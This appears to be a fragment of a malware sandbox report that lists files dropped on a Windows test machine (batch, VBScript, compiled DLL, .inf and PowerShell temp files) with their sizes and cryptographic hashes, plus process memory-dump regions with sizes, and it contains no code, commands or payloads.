      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        936B

        MD5

        be38be7ca6f1d6a15387755e03d88839

        SHA1

        396444cb7ba72f7d759390b0cf221db284e0f790

        SHA256

        08438e5b2b73447ed36b907a24116f6e8d008ac4feb466e3621d3e283ea015f0

        SHA512

        cf36451659bb4b525f67e06fa26931130237e901efd5be1671621f93918c38733e5604b5915a27bbcabcd87ab0187313bb6bead774ab5fe4a6a85503faaa774e

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        4a94b4432dca934df6651a53f56abe6b

        SHA1

        1461c5bc22eaef55ed98713d67a4c5f5c8e11d69

        SHA256

        63455ddf3d736ca85a5a6805851142c18f28b9987d5f6caa9dd490269b34f8a2

        SHA512

        8f262e5b722138e3b1576e89528a46c031a0239939d45916e0a688ca802c6de3d3ddf19391a6b5660ac7fb9dc9da25eb9c2ad8fd77ed798175a09e2095cb94b6

      • C:\Users\Admin\AppData\Local\Temp\RES6E79.tmp

        Filesize

        1KB

        MD5

        2704e52a4a75aae0d61cac73e4464eb7

        SHA1

        7e08a38c92be9bfd6e8027a8eccf251ff8c9e6c6

        SHA256

        4877c9b9ddfa4ebc351adaf94b278bf3654d2df23b92e30ea5d2981b6fe3714c

        SHA512

        cd5f1431d88c32b6bf927d27d693b6474b8ecdd6f2d4508171f2a52660209ce0605f89b704228fc2987895ebb96fb56bde958d3f45566ef22d7f58054bb38549

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cyhiuosk.hso.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\c.bat

        Filesize

        269KB

        MD5

        953ca19c7ec317a9e61eb0b37e5fba45

        SHA1

        e5b07ef0f6a2a9ca0f9f26c622521861dc6cd786

        SHA256

        2c62df16384cc9b4ef023b57b151fe6711cd03306b7dd1929f773ae1dd77c49d

        SHA512

        fa7c7c8cb9318813de121c28121d8862d78763992276441265bf776041c2cb938f9e087f3ede559a7c096c14f31e2d41c2b72b86f48330efc36665a8f046d7de

      • C:\Users\Admin\AppData\Local\Temp\dn1ahvmk\dn1ahvmk.dll

        Filesize

        4KB

        MD5

        9d56726bf19c1510b5be350f4765276b

        SHA1

        2b4145dd3984be107496a1baa12e586d82f99de6

        SHA256

        680b775f5a7c8671f76cf9204375b787c0738ed88c7155c9d984fee535e36543

        SHA512

        5f0ccb02824e304628de482b6cc9ea1bbe53e73360ec5abcdb442736d19e8540abce2ee64f5ca672626999e8bdcf89811455e28eedc48279738f6f1d08c53d3a

      • C:\Users\Admin\AppData\Local\Temp\tmp6561.vbs

        Filesize

        275KB

        MD5

        8a6ef426368a7e273704a654aee6ee82

        SHA1

        285152199560e1970295e0a5f1eb1e017b2391af

        SHA256

        5d071dc05b819c190e333a894db3b16e96f8531b280618c776dfe0505452d2df

        SHA512

        2a94c18195a591947d934782d1f63b71184d4c389761b61703f3cd18e229f100c38858ddf7c275cb930a0f05dfe6d6dce90f2a9d1ea3ec643ac09483512f00aa

      • C:\windows\temp\a2ptq5yy.inf

        Filesize

        663B

        MD5

        27581dbbe3c3840ce72f99c21071898a

        SHA1

        898afeb9523df9367c74a01c0dbecf6b637f3cb1

        SHA256

        c5f2bbdebccd52c3eba3c97a251ffa2ccd01f64de764e560f804045fe868d27b

        SHA512

        0b9c4531e8be5b292638cb2cad7fd1b72ed3f1aa20ea027b9a013a8bfb2daaa4a25a40c37423e0924d110bbbbfad4a6e21aa03f4694978d205d7ac9739567d9f

      • \??\c:\Users\Admin\AppData\Local\Temp\dn1ahvmk\CSCDCC72EAF64314111B8ABB06133DF631.TMP

        Filesize

        652B

        MD5

        1afda42f0f7bd8e13af0f7a824e5d7b1

        SHA1

        dd871b23071cdf1b59bf4dcb285e1f16dc3bf09a

        SHA256

        27bb2cbbb39dd832d619d5b57edf94d2d32f02aa0570ffdd339c3300d29ce66f

        SHA512

        f1d59edc42411a9279884b9fbc4adde4f5b3ecfeef6bc465a9229042c6a9916d1e4ce870c1a5013cbad8743e526c4116d2d5479b824331ac994bd42a674862a6

      • \??\c:\Users\Admin\AppData\Local\Temp\dn1ahvmk\dn1ahvmk.0.cs

        Filesize

        2KB

        MD5

        b8106096972fb511e0cf8b99386ecf93

        SHA1

        3003ba3a3681ba16d124d5b2305e6cc59af79b44

        SHA256

        49d2a0f78cbec3d87396b6f52f791c66505edeec87a70d4ce45721288210da02

        SHA512

        218bd9cd17c56d2e138205a197780cc2a5a81bfce7d5439eecb168f61955ba97793e7333425c064f6b6337e1f70c75bd373a7fb502a8c538fb046600018f871e

      • \??\c:\Users\Admin\AppData\Local\Temp\dn1ahvmk\dn1ahvmk.cmdline

        Filesize

        369B

        MD5

        da8be00f88edc8c0e565b8a85a6c0e34

        SHA1

        c8ea0395c5b99bb647ee7d10b9cc9ecfd3136185

        SHA256

        d91c80ab86f2adcaaadd4188e8a6522eb7528340f387c5e78de9fcdb5982d3db

        SHA512

        0edec38e282725798e8fd1e5f3e7628caeeefa8395f595de9cc63de35a88c34d4f536dc59f9757351e59b8ac2cc81210000d56a40575c9749a000fad633d7a17

      • memory/1828-28-0x000002D4E54D0000-0x000002D4E54EC000-memory.dmp

        Filesize

        112KB

      • memory/1828-44-0x000002D4E5550000-0x000002D4E5558000-memory.dmp

        Filesize

        32KB

      • memory/3240-70-0x0000000005860000-0x00000000058C6000-memory.dmp

        Filesize

        408KB

      • memory/3240-88-0x00000000704B0000-0x0000000070804000-memory.dmp

        Filesize

        3.3MB

      • memory/3240-118-0x0000000009460000-0x000000000946A000-memory.dmp

        Filesize

        40KB

      • memory/3240-116-0x0000000009320000-0x000000000935C000-memory.dmp

        Filesize

        240KB

      • memory/3240-66-0x0000000003110000-0x0000000003146000-memory.dmp

        Filesize

        216KB

      • memory/3240-67-0x0000000005980000-0x0000000005FA8000-memory.dmp

        Filesize

        6.2MB

      • memory/3240-68-0x0000000005750000-0x0000000005772000-memory.dmp

        Filesize

        136KB

      • memory/3240-69-0x00000000057F0000-0x0000000005856000-memory.dmp

        Filesize

        408KB

      • memory/3240-115-0x00000000092C0000-0x00000000092D2000-memory.dmp

        Filesize

        72KB

      • memory/3240-80-0x0000000005FF0000-0x0000000006344000-memory.dmp

        Filesize

        3.3MB

      • memory/3240-114-0x0000000008700000-0x0000000008792000-memory.dmp

        Filesize

        584KB

      • memory/3240-82-0x0000000006500000-0x000000000651E000-memory.dmp

        Filesize

        120KB

      • memory/3240-83-0x0000000006550000-0x000000000659C000-memory.dmp

        Filesize

        304KB

      • memory/3240-84-0x0000000007E40000-0x00000000084BA000-memory.dmp

        Filesize

        6.5MB

      • memory/3240-85-0x0000000006A30000-0x0000000006A4A000-memory.dmp

        Filesize

        104KB

      • memory/3240-86-0x0000000007C50000-0x0000000007C82000-memory.dmp

        Filesize

        200KB

      • memory/3240-87-0x0000000070320000-0x000000007036C000-memory.dmp

        Filesize

        304KB

      • memory/3240-113-0x0000000008600000-0x000000000865E000-memory.dmp

        Filesize

        376KB

      • memory/3240-98-0x0000000007C90000-0x0000000007CAE000-memory.dmp

        Filesize

        120KB

      • memory/3240-99-0x0000000007CC0000-0x0000000007D63000-memory.dmp

        Filesize

        652KB

      • memory/3240-100-0x0000000007DC0000-0x0000000007DCA000-memory.dmp

        Filesize

        40KB

      • memory/3240-101-0x0000000008560000-0x00000000085F6000-memory.dmp

        Filesize

        600KB

      • memory/3240-102-0x0000000007DD0000-0x0000000007DE1000-memory.dmp

        Filesize

        68KB

      • memory/3240-103-0x0000000007E00000-0x0000000007E0E000-memory.dmp

        Filesize

        56KB

      • memory/3240-104-0x0000000007E20000-0x0000000007E34000-memory.dmp

        Filesize

        80KB

      • memory/3240-105-0x00000000084E0000-0x00000000084FA000-memory.dmp

        Filesize

        104KB

      • memory/3240-106-0x00000000084D0000-0x00000000084D8000-memory.dmp

        Filesize

        32KB

      • memory/3240-108-0x00000000054B0000-0x00000000054B8000-memory.dmp

        Filesize

        32KB

      • memory/3240-109-0x0000000007C90000-0x0000000007CC4000-memory.dmp

        Filesize

        208KB

      • memory/3240-110-0x0000000008BB0000-0x0000000009154000-memory.dmp

        Filesize

        5.6MB

      • memory/3792-31-0x00007FFD47820000-0x00007FFD482E1000-memory.dmp

        Filesize

        10.8MB

      • memory/3792-1-0x0000025376F70000-0x0000025376F92000-memory.dmp

        Filesize

        136KB

      • memory/3792-0-0x00007FFD47823000-0x00007FFD47825000-memory.dmp

        Filesize

        8KB

      • memory/3792-7-0x00007FFD47820000-0x00007FFD482E1000-memory.dmp

        Filesize

        10.8MB

      • memory/3792-12-0x00007FFD47820000-0x00007FFD482E1000-memory.dmp

        Filesize

        10.8MB